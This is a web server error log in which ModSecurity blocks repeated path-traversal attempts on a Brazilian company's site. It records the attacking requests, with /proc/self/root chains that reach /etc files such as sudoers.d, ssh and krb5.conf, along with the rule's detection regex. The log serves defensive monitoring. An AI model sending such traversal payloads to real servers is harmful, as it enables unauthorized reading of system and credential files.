[Mon Mar 16 10:13:36.387192 2026] [:error] [pid 32654:tid 140411649607424] [client 74.7.243.203:43702] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCAAlT9VtDQc7bgUyd3QAAAQs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:13:41.704535 2026] [:error] [pid 21946:tid 140411574073088] [client 74.7.243.203:48120] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCBXbQATo66fKoS7w-_wAAANQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:13:48.342128 2026] [:error] [pid 10831:tid 140411607643904] [client 74.7.243.203:39110] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCDI6lpbStxTqkSktgAAAAAlA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:14:38.769979 2026] [:error] [pid 32654:tid 140411683178240] [client 74.7.243.203:57286] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/localtime"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCPQlT9VtDQc7bgUyd_QAAAQc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:14:45.412653 2026] [:error] [pid 10772:tid 140411557287680] [client 74.7.243.203:43242] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sudo-ldap.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCRf9ocpUE4ed4uDzfNQAAAhY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:15:03.585194 2026] [:error] [pid 21805:tid 140411725141760] [client 74.7.243.203:57074] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/libaudit.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCV7ABkC4fWIHEf8HcvAAAAEI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:15:14.681872 2026] [:error] [pid 10709:tid 140411599251200] [client 74.7.241.46:33902] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/krb5.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCYhXjF1vJNtV6CWrq7wAAAdE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:15:16.475434 2026] [:error] [pid 10831:tid 140411666392832] [client 74.7.241.46:53350] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCZI6lpbStxTqkSktgDQAAAkk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:15:17.643480 2026] [:error] [pid 21805:tid 140411708356352] [client 74.7.241.46:53354] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCZbABkC4fWIHEf8HcxwAAAEQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:15:18.955838 2026] [:error] [pid 10772:tid 140411574073088] [client 74.7.241.46:45746] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCZv9ocpUE4ed4uDzfPgAAAhQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:15:19.034164 2026] [:error] [pid 32654:tid 140411582465792] [client 74.7.243.203:39978] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCZwlT9VtDQc7bgUyeDwAAARM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:15:20.167417 2026] [:error] [pid 21533:tid 140411733534464] [client 74.7.241.46:45760] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCaHjZBu2q05ozVU9HcgAAAUE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:15:21.465350 2026] [:error] [pid 10831:tid 140411624429312] [client 74.7.241.46:45774] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCaY6lpbStxTqkSktgDgAAAk4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:15:23.669543 2026] [:error] [pid 10651:tid 140411624429312] [client 74.7.241.46:45782] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCa7ysWC90G-1nBrA2zAAAAY4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:15:25.173044 2026] [:error] [pid 10709:tid 140411683178240] [client 74.7.241.46:45788] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCbRXjF1vJNtV6CWrq8QAAAcc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:15:26.372316 2026] [:error] [pid 21805:tid 140411725141760] [client 74.7.241.46:45800] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCbrABkC4fWIHEf8Hc0QAAAEI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:15:27.578521 2026] [:error] [pid 11972:tid 140411683178240] [client 74.7.241.46:45804] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCb5qj1wV0Si-OkefavAAAAAc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:15:28.863625 2026] [:error] [pid 21946:tid 140411574073088] [client 74.7.241.46:53150] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCcHbQATo66fKoS7w_JgAAANQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:15:29.159807 2026] [:error] [pid 21533:tid 140411725141760] [client 74.7.243.203:47566] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCcXjZBu2q05ozVU9HdgAAAUI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:15:30.121810 2026] [:error] [pid 21806:tid 140411540502272] [client 74.7.241.46:53166] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCctSswJuvopo3lOhR3QAAAJg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:15:31.350018 2026] [:error] [pid 21946:tid 140411565680384] [client 74.7.241.46:53172] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCc3bQATo66fKoS7w_KgAAANU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:15:32.532745 2026] [:error] [pid 21533:tid 140411540502272] [client 74.7.241.46:53184] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCdHjZBu2q05ozVU9HeQAAAVg"], referer: 